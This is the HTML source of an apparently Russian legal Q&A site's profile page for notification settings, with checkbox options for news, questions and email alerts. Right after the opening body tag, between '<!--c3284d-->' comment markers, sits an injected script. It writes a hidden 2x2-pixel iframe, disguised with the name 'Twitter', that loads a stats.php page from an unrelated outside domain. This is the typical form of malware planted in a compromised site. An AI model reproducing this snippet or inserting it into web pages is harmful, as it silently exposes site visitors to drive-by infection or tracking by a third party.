<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="social-enter">Войти через: <img src="design/images/social-login.jpg" alt=""></div>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<ul>
						<li><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li class="active"><a href="">Личный кабинет</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<aside id="left-profile">
					<div id="userIn">
						<div class="img"><img src="design/images/faceHuge.jpg" alt=""></div>
						<p>Иванова Снежанна</p>
						<p class="myMessages"><a href="">Мои сообщения</a> (<span>3</span>)</p>
					</div>
					<div id="profile">
						<div class="profile">
							<ul>
								<li><a href="">Редактировать профиль</a>
									<ul>
										<li><a href="">Личная информация</a></li>
										<li><a href="">Образование и работа</a></li>
										<li><a href="">Контатная информация</a></li>
										<li><a href="">Услуги</a></li>
										<li class="active">Настройка оповещений</li>
										<li><a href="">Рекламная компания</a></li>
									</ul>
								</li>
								<li class="back"><a href="">Назад</a></li>
							</ul>
						</div>
						<div class="leftSay"></div>
					</div>
				</aside>
				<section id="right-profile">
					<div class="wrapper">
						<div class="head">Редактировать профиль</div>
						<div class="personalInfo">
							<form>
								<p class="title">Настройка оповещений</p>
								<ul class="page4">
									<li><input type="checkbox" name="juridicalNews" id="juridicalNews"><label for="juridicalNews">Юридические новости</label></li>
									<li><input type="checkbox" name="taglNews" id="taglNews"><label for="taglNews">Новые вопросы от пользователей с тегами</label></li>

										<div id="selectionChoose" style="display:none">
											<div class="head">
												«&nbsp;<a href="">Назад</a>
											</div>
											<div class="body">
												<ul>
													<li>
														<input type="checkbox" name="checkbox__1" id="checkbox__1">
														<label for="checkbox__1">Судебные и досудебные процедуры. Исполнение решений</label>
														<span>процессуальные вопросы участия в судебном процессе</span>
														<span>аминистративная ответственность</span>
														<span>уголовная ответственность</span>
														<span>обжалование судебных актов</span>
														<span>исполнение судебных решений</span>
														<span>европейский суд по правам человека</span>
													</li>
													<li>
														<input type="checkbox" name="checkbox__2" id="checkbox__2">
														<label for="checkbox__2">Частный вопрос</label>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
													</li>
													<li>
														<input type="checkbox" name="checkbox__3" id="checkbox__3">
														<label for="checkbox__3">Частный вопрос</label>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
													</li>
													<li>
														<input type="checkbox" name="checkbox__4" id="checkbox__4">
														<label for="checkbox__4">Частный вопрос</label>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
													</li>
													<li>
														<input type="checkbox" name="checkbox__5" id="checkbox__5">
														<label for="checkbox__5">Частный вопрос</label>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
													</li>
													<li>
														<input type="checkbox" name="checkbox__6" id="checkbox__6">
														<label for="checkbox__6">Частный вопрос</label>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
														<span>Подпункт</span>
													</li>
												</ul>
											</div>
										</div>
									<li><input type="checkbox" name="comments" id="comments"><label for="comments">Комментарии к ответам на вопросы</label></li>
									<li><input type="checkbox" name="newQuestion" id="newQuestion"><label for="newQuestion">Новые вопросы от пользователей с тегами</label></li>
								</ul>
								<div class="clear">&nbsp;</div>
								<p class="title">Оповещения по электронной почте</p>
								<dl>
									<dt><label for="emailNotify" class="emailNotify">E-mail для оповещений:</label></dt>
									<dd><input type="email" name="emailNotify" id="emailNotify"></dd>
								</dl>
								<div class="clear">&nbsp;</div>
								<ul>
									<li><input type="checkbox" name="newPersonalQuestion" id="newPersonalQuestion"><label for="newPersonalQuestion">Новые персональные вопросы от пользователей</label></li>
									<li><input type="checkbox" name="newMessage" id="newMessage"><label for="newMessage">Новые сообщения от пользователей</label></li>
									<li><input type="checkbox" name="juridicalNews" id="juridicalNews"><label for="juridicalNews">Юридические новости</label></li>
									<li><input type="checkbox" name="newQuestion" id="newQuestion"><label for="newQuestion">Новые вопросы от пользователей по специализации</label></li>
									<li><input type="checkbox" name="commentsEmail" id="commentsEmail"><label for="commentsEmail">Комментарии к ответам на вопросы</label></li>
									<li><input type="checkbox" name="newJob" id="newJob"><label for="newJob">Сообщения о новой работе по специализации</label></li>
								</ul>
								<div class="buttonHolder9"><input type="submit" class="buttonSave" value="Сохранить"></div>
							</form>
						</div>
					</div>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>